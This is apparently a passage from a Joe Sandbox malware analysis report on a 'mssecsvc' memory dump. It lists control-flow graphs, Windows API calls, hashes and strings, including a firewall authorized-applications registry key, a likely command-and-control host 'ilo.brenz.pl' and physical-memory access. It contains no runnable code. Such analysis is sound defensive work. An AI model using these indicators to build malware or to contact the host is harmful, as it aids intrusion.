a84170 749->761 762 a84195-a841a5 call a83358 749->762 750->735 763 a84192-a84194 761->763 764 a84172-a8418c 761->764 768 a841c3-a841ca 762->768 769 a841a7-a841bd CreateThread CloseHandle 762->769 763->762 764->763 770 a8418e 764->770 771 a841d0-a841eb 768->771 769->768 770->763 773 a841ed-a841f4 771->773 774 a84210-a84214 771->774 773->774 775 a841f6-a84207 GetTickCount 773->775 774->750 776 a8421a-a8421c 774->776 775->774 777 a84209 775->777 778 a8421e-a84236 776->778 777->774 779 a84238 778->779 780 a8423b-a84243 778->780 779->780 780->778 781 a84245 780->781 782 a8424b-a8424f 781->782 783 a84261-a84263 782->783 784 a84251-a84258 call a82f08 782->784 785 a84265-a8426f 783->785 784->750 790 a8425a 784->790 787 a84274-a84282 call a86541 call a8655b 785->787 787->771 795 a84288-a84292 Sleep 787->795 790->785 792 a8425c-a8425f 790->792 792->782 795->787 796 a84294-a842a5 GetTickCount 795->796 796->771 797 a842ab-a842b2 796->797 797->750 797->771
                                                                                APIs
                                                                                • lstrcat.KERNEL32(00A86AA2,00A83D12), ref: 00A83D20
                                                                                  • Part of subcall function 00A83D36: LoadLibraryA.KERNEL32(00A83D2B), ref: 00A83D36
                                                                                  • Part of subcall function 00A83D36: GetProcAddress.KERNEL32(00000000,00A83D41), ref: 00A83D4C
                                                                                  • Part of subcall function 00A83D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00A83D5F
                                                                                  • Part of subcall function 00A83D36: GetTickCount.KERNEL32 ref: 00A83D93
                                                                                  • Part of subcall function 00A83D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00A86EF6,00000000,00000000,00000000,00000000), ref: 00A83E65
                                                                                Strings
                                                                                • ADVAPI32.DLL, xrefs: 00A83D5E
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
                                                                                • String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 2038497427-2287716718
                                                                                • Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                                                                                • Instruction ID: 20da30903828791677f4010d0b63f2f0451aecedf0ef06bf9e07418c9739eed2
                                                                                • Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                                                                                • Instruction Fuzzy Hash: 9CE1EF72508259BFEF25AF24CC0EBEA7BACEF41700F004559ED499E082E6F46F4587A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A83D36 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 379libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 798 a83d36-a83dc0 LoadLibraryA call a83d4b GetProcAddress LoadLibraryA call a810ce call a801cb GetTickCount call a83b76 809 a83dc8-a83dcd call a83b76 798->809 810 a83dc2 798->810 813 a83dcf-a83de6 809->813 810->809 814 a83de8-a83df8 call a863a0 call a8273c 813->814 819 a83dfa-a83dfc 814->819 820 a83dfe-a83e1a call a863a0 814->820 822 a83e1b-a83e1c 819->822 820->822 822->814 824 a83e1e-a83e24 822->824 824->813 825 a83e26-a83e30 call a8273c 824->825 828 a83e3f-a83e78 call a8273c GetVolumeInformationA 825->828 829 a83e32-a83e3a call a82750 825->829 833 a83e7a-a83e80 828->833 834 a83e82-a83e88 828->834 829->828 836 a83e91-a83e9e 833->836 835 a83e8a 834->835 834->836 835->836 837 a83ea4-a83ec3 call a83eb5 836->837 838 a83f25 836->838 845 a83f1c-a83f1e 837->845 846 a83ec6-a83ec8 837->846 840 a83f2f 838->840 842 a83f4f-a83fd1 call a83f60 call a810ce call a83f8f 840->842 843 a83f31-a83f49 CreateThread CloseHandle 840->843 858 a83ffa-a8400b CreateEventA 842->858 859 a83fd3-a83ff8 CreateThread CloseHandle 842->859 843->842 845->838 849 a83f20 call a83405 845->849 846->840 848 a83eca-a83f14 GetModuleFileNameA 846->848 848->845 849->838 860 a84012-a8402a call a837fa 858->860 859->858 863 a8402c-a8402f 860->863 864 a84031-a84044 call a83b90 860->864 863->864 865 a8404c-a84054 863->865 870 a8404a 864->870 871 a842be-a842c5 864->871 867 a84065-a8406e 865->867 868 a84056-a84063 lstrlen 865->868 878 a84074-a8407b 867->878 879 a84315-a8431b 867->879 868->867 868->868 872 a84081-a840a0 870->872 874 a84320-a84322 RtlExitUserThread 871->874 875 a842c7-a842ce 871->875 872->871 883 a840a6-a840b9 872->883 876 a842d0-a842dc SetEvent 875->876 877 a842e2-a842e9 875->877 876->877 880 a842eb 877->880 881 a842f2-a84310 Sleep ResetEvent 877->881 878->872 879->860 880->881 881->860 885 a840bf-a8416e call a8273c call a82750 GetVersionExA call a82750 call a83358 call a84178 883->885 886 a842b7 883->886 897 a84170 885->897 898 a84195-a841a5 call a83358 885->898 886->871 899 a84192-a84194 897->899 900 a84172-a8418c 897->900 904 a841c3-a841ca 898->904 905 a841a7-a841bd CreateThread CloseHandle 898->905 899->898 900->899 906 a8418e 900->906 907 a841d0-a841eb 904->907 905->904 906->899 909 a841ed-a841f4 907->909 910 a84210-a84214 907->910 909->910 911 a841f6-a84207 GetTickCount 909->911 910->886 912 a8421a-a8421c 910->912 911->910 913 a84209 911->913 914 a8421e-a84236 912->914 913->910 915 a84238 914->915 916 a8423b-a84243 914->916 915->916 916->914 917 a84245 916->917 918 a8424b-a8424f 917->918 919 a84261-a84263 918->919 920 a84251-a84258 call a82f08 918->920 921 a84265-a8426f 919->921 920->886 926 a8425a 920->926 923 a84274-a84282 call a86541 call a8655b 921->923 923->907 931 a84288-a84292 Sleep 923->931 926->921 928 a8425c-a8425f 926->928 928->918 931->923 932 a84294-a842a5 GetTickCount 931->932 932->907 933 a842ab-a842b2 932->933 933->886 933->907
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00A83D2B), ref: 00A83D36
                                                                                  • Part of subcall function 00A83D4B: GetProcAddress.KERNEL32(00000000,00A83D41), ref: 00A83D4C
                                                                                  • Part of subcall function 00A83D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00A83D5F
                                                                                  • Part of subcall function 00A83D4B: GetTickCount.KERNEL32 ref: 00A83D93
                                                                                  • Part of subcall function 00A83D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00A86EF6,00000000,00000000,00000000,00000000), ref: 00A83E65
                                                                                Strings
                                                                                • ADVAPI32.DLL, xrefs: 00A83D5E
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolume
                                                                                • String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 3734769084-2287716718
                                                                                • Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                                                                                • Instruction ID: 3cb4380af3215571971cca6529874d6bb3276ab8cb018f5df2c6e13f6b14dbfc
                                                                                • Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                                                                                • Instruction Fuzzy Hash: E3D1DD72918249BFEF25AF24CC0ABEA7BACEF41700F004659ED499E082D6F45F4587A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A83D4B Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 386librarythreadsleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 934 a83d4b-a83d72 GetProcAddress LoadLibraryA 935 a83d7d-a83dc0 call a801cb GetTickCount call a83b76 934->935 936 a83d78 call a810ce 934->936 941 a83dc8-a83dcd call a83b76 935->941 942 a83dc2 935->942 936->935 945 a83dcf-a83de6 941->945 942->941 946 a83de8-a83df8 call a863a0 call a8273c 945->946 951 a83dfa-a83dfc 946->951 952 a83dfe-a83e1a call a863a0 946->952 954 a83e1b-a83e1c 951->954 952->954 954->946 956 a83e1e-a83e24 954->956 956->945 957 a83e26-a83e30 call a8273c 956->957 960 a83e3f-a83e78 call a8273c GetVolumeInformationA 957->960 961 a83e32-a83e3a call a82750 957->961 965 a83e7a-a83e80 960->965 966 a83e82-a83e88 960->966 961->960 968 a83e91-a83e9e 965->968 967 a83e8a 966->967 966->968 967->968 969 a83ea4-a83ec3 call a83eb5 968->969 970 a83f25 968->970 977 a83f1c-a83f1e 969->977 978 a83ec6-a83ec8 969->978 972 a83f2f 970->972 974 a83f4f-a83fd1 call a83f60 call a810ce call a83f8f 972->974 975 a83f31-a83f49 CreateThread CloseHandle 972->975 990 a83ffa-a8400b CreateEventA 974->990 991 a83fd3-a83ff8 CreateThread CloseHandle 974->991 975->974 977->970 981 a83f20 call a83405 977->981 978->972 980 a83eca-a83f14 GetModuleFileNameA 978->980 980->977 981->970 992 a84012-a8402a call a837fa 990->992 991->990 995 a8402c-a8402f 992->995 996 a84031-a84044 call a83b90 992->996 995->996 997 a8404c-a84054 995->997 1002 a8404a 996->1002 1003 a842be-a842c5 996->1003 999 a84065-a8406e 997->999 1000 a84056-a84063 lstrlen 997->1000 1010 a84074-a8407b 999->1010 1011 a84315-a8431b 999->1011 1000->999 1000->1000 1004 a84081-a840a0 1002->1004 1006 a84320-a84322 RtlExitUserThread 1003->1006 1007 a842c7-a842ce 1003->1007 1004->1003 1015 a840a6-a840b9 1004->1015 1008 a842d0-a842dc SetEvent 1007->1008 1009 a842e2-a842e9 1007->1009 1008->1009 1012 a842eb 1009->1012 1013 a842f2-a84310 Sleep ResetEvent 1009->1013 1010->1004 1011->992 1012->1013 1013->992 1017 a840bf-a8416e call a8273c call a82750 GetVersionExA call a82750 call a83358 call a84178 1015->1017 1018 a842b7 1015->1018 1029 a84170 1017->1029 1030 a84195-a841a5 call a83358 1017->1030 1018->1003 1031 a84192-a84194 1029->1031 1032 a84172-a8418c 1029->1032 1036 a841c3-a841ca 1030->1036 1037 a841a7-a841bd CreateThread CloseHandle 1030->1037 1031->1030 1032->1031 1038 a8418e 1032->1038 1039 a841d0-a841eb 1036->1039 1037->1036 1038->1031 1041 a841ed-a841f4 1039->1041 1042 a84210-a84214 1039->1042 1041->1042 1043 a841f6-a84207 GetTickCount 1041->1043 1042->1018 1044 a8421a-a8421c 1042->1044 1043->1042 1045 a84209 1043->1045 1046 a8421e-a84236 1044->1046 1045->1042 1047 a84238 1046->1047 1048 a8423b-a84243 1046->1048 1047->1048 1048->1046 1049 a84245 1048->1049 1050 a8424b-a8424f 1049->1050 1051 a84261-a84263 1050->1051 1052 a84251-a84258 call a82f08 1050->1052 1053 a84265-a8426f 1051->1053 1052->1018 1058 a8425a 1052->1058 1055 a84274-a84282 call a86541 call a8655b 1053->1055 1055->1039 1063 a84288-a84292 Sleep 1055->1063 1058->1053 1060 a8425c-a8425f 1058->1060 1060->1050 1063->1055 1064 a84294-a842a5 GetTickCount 1063->1064 1064->1039 1065 a842ab-a842b2 1064->1065 1065->1018 1065->1039
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,00A83D41), ref: 00A83D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00A83D5F
                                                                                • GetTickCount.KERNEL32 ref: 00A83D93
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00A86EF6,00000000,00000000,00000000,00000000), ref: 00A83E65
                                                                                • GetModuleFileNameA.KERNEL32(00000000,00A86AA2,000000C8), ref: 00A83EE2
                                                                                • CreateThread.KERNEL32(00000000,00000000,00A83691,00000000,00000000), ref: 00A83F40
                                                                                • CloseHandle.KERNEL32(?,6EF1083C), ref: 00A83F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00A83FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00A83FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00A83FFF
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00A840FB
                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 00A842D6
                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 00A842F7
                                                                                • ResetEvent.KERNEL32(?,?,00000000), ref: 00A8430A
                                                                                Strings
                                                                                • ADVAPI32.DLL, xrefs: 00A83D5E
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleThread$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolume
                                                                                • String ID: ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 1484325168-2287716718
                                                                                • Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                                                                                • Instruction ID: dd1a5fdc02b5fc83e2057c047ae76deeac3183287111034bc0bb66dbaa6d39df
                                                                                • Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                                                                                • Instruction Fuzzy Hash: 12E1EF72508249BFEF25AF248C0EBEA7BACEF45700F004659ED499E082D6F46F45C7A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A84178 Relevance: 13.7, APIs: 9, Instructions: 192sleepstringthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00A84057
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00A840FB
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00A841B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,00A86AA2,00000000,00000000), ref: 00A841BD
                                                                                • GetTickCount.KERNEL32 ref: 00A841F6
                                                                                • Sleep.KERNEL32(00000064,?,00000000,6F6C6902,00A86AA2,00000000,00000000), ref: 00A8428B
                                                                                • GetTickCount.KERNEL32 ref: 00A84294
                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 00A842D6
                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 00A842F7
                                                                                • ResetEvent.KERNEL32(?,?,00000000), ref: 00A8430A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionlstrlen
                                                                                • String ID:
                                                                                • API String ID: 1413472813-0
                                                                                • Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                                                                                • Instruction ID: a4f12dd37a02ff4de0b6b215c3db3096f4da777feb032e3557cbd41c8fa3624b
                                                                                • Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                                                                                • Instruction Fuzzy Hash: 9871DE7150825ABAEF31AF24881D7EEBFADEF49310F140608E85A9E181D7F45F41C765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A833E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 220filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00A8344A
                                                                                • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00A83469
                                                                                • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00A83493
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00A834A0
                                                                                • UnmapViewOfFile.KERNEL32(?), ref: 00A834B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                                                                                • String ID: \Device\PhysicalMemory
                                                                                • API String ID: 2985292042-2007344781
                                                                                • Opcode ID: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
                                                                                • Instruction ID: f8c4bebc67d6601d6ba6f0b13a5c45be8eaec49da6081769b17315f9ff9d74e3
                                                                                • Opcode Fuzzy Hash: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
                                                                                • Instruction Fuzzy Hash: CB817971500208FFEB249F15CC89AAA3BBCFF44B15F604658ED199B291D7F0AF458B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A83405 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00A8344A
                                                                                • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00A83469
                                                                                • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00A83493
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00A834A0
                                                                                • UnmapViewOfFile.KERNEL32(?), ref: 00A834B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                                                                                • String ID: ysic
                                                                                • API String ID: 2985292042-20973071
                                                                                • Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                                                                                • Instruction ID: 9bc6f851d5d847579ad691e1c666b5b2115b46a9f5d36429c8561fa637ab3aac
                                                                                • Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                                                                                • Instruction Fuzzy Hash: 01118F71140608FBEB34DF14CC59FAA367CEF88B04F50451CEA199B290E7F46F188A68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A824AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcpyW.KERNEL32(?,\BaseNamedObjects\npbtVt), ref: 00A824BA
                                                                                • lstrlenW.KERNEL32(?), ref: 00A824C1
                                                                                • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 00A82516
                                                                                Strings
                                                                                • \BaseNamedObjects\npbtVt, xrefs: 00A824B8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateSectionlstrcpylstrlen
                                                                                • String ID: \BaseNamedObjects\npbtVt
                                                                                • API String ID: 2597515329-3914055295
                                                                                • Opcode ID: 1f6d0fdb519297aa2f4b2c942eb0fea1a6789580d20f20054a6c5e42652ba7e7
                                                                                • Instruction ID: 9f781ca1f05e39b826350c8bad57f2aa53861824959ece5f967ff4538a22a5d8
                                                                                • Opcode Fuzzy Hash: 1f6d0fdb519297aa2f4b2c942eb0fea1a6789580d20f20054a6c5e42652ba7e7
                                                                                • Instruction Fuzzy Hash: 100181B0781344BAF7309B29CC4BF5B7929DF81B50F508558F709AE1C4DAB89A0483A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A83F8F Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 224threadlibrarystringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00A83F83), ref: 00A83F8F
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00A83FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00A83FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00A83FFF
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00A84057
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00A840FB
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00A841B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,00A86AA2,00000000,00000000), ref: 00A841BD
                                                                                • GetTickCount.KERNEL32 ref: 00A841F6
                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 00A84322
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadTickUserVersionlstrlen
                                                                                • String ID: ilo.brenz.pl
                                                                                • API String ID: 2802001013-878173267
                                                                                • Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                                                                                • Instruction ID: 86bf04ff36d97d4c71ad8e6cee8a3a8d5b7e30b93e45b2e47be838ff3dd2b2f0
                                                                                • Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
                                                                                • Instruction Fuzzy Hash: F991DD7150824ABAEB31AF24881DBEE7FADEF49301F040608E99A9E181D3F45F45CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A83EB5 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 276librarythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00A83EA9), ref: 00A83EB5
                                                                                  • Part of subcall function 00A83ECC: GetProcAddress.KERNEL32(00000000,00A83EC0), ref: 00A83ECD
                                                                                  • Part of subcall function 00A83ECC: GetModuleFileNameA.KERNEL32(00000000,00A86AA2,000000C8), ref: 00A83EE2
                                                                                  • Part of subcall function 00A83ECC: CreateThread.KERNEL32(00000000,00000000,00A83691,00000000,00000000), ref: 00A83F40
                                                                                  • Part of subcall function 00A83ECC: CloseHandle.KERNEL32(?,6EF1083C), ref: 00A83F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00A83FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00A83FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00A83FFF
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00A840FB
                                                                                Strings
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseHandleThread$AddressEventFileLibraryLoadModuleNameProcVersion
                                                                                • String ID: SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 4113580538-621207024
                                                                                • Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                                                                                • Instruction ID: 60b97a96ad4cc42de0a757e0d97cb49ba06ba6bb092f85f9f4d409b46830160c
                                                                                • Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
                                                                                • Instruction Fuzzy Hash: C2A1EF72408249BFEB21AF248C5EBEA7FACEF45700F044649F9498E082D6F45F45C7A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A83ECC Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 265threadlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,00A83EC0), ref: 00A83ECD
                                                                                • GetModuleFileNameA.KERNEL32(00000000,00A86AA2,000000C8), ref: 00A83EE2
                                                                                • CreateThread.KERNEL32(00000000,00000000,00A83691,00000000,00000000), ref: 00A83F40
                                                                                • CloseHandle.KERNEL32(?,6EF1083C), ref: 00A83F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00A83FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00A83FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00A83FFF
                                                                                  • Part of subcall function 00A83405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00A8344A
                                                                                  • Part of subcall function 00A83405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00A83469
                                                                                  • Part of subcall function 00A83405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00A83493
                                                                                  • Part of subcall function 00A83405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00A834A0
                                                                                  • Part of subcall function 00A83405: UnmapViewOfFile.KERNEL32(?), ref: 00A834B8
                                                                                Strings
                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00A83F0C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmap
                                                                                • String ID: SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 3400179232-621207024
                                                                                • Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                                                                                • Instruction ID: 1a874cc303d71709398dc7fe8c8f23a86968613d4148dc8e28cc0ff437744e7b
                                                                                • Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                                                                                • Instruction Fuzzy Hash: D7A1E072508259BFEB21AF24CC5EBEA7BACEF45300F044649F8499E081E6F46F45C7A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A83F60 Relevance: 12.2, APIs: 8, Instructions: 215librarystringthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00A83F54), ref: 00A83F60
                                                                                  • Part of subcall function 00A83F8F: LoadLibraryA.KERNEL32(00A83F83), ref: 00A83F8F
                                                                                  • Part of subcall function 00A83F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00A83FE9
                                                                                  • Part of subcall function 00A83F8F: CloseHandle.KERNEL32(?,00000000), ref: 00A83FF2
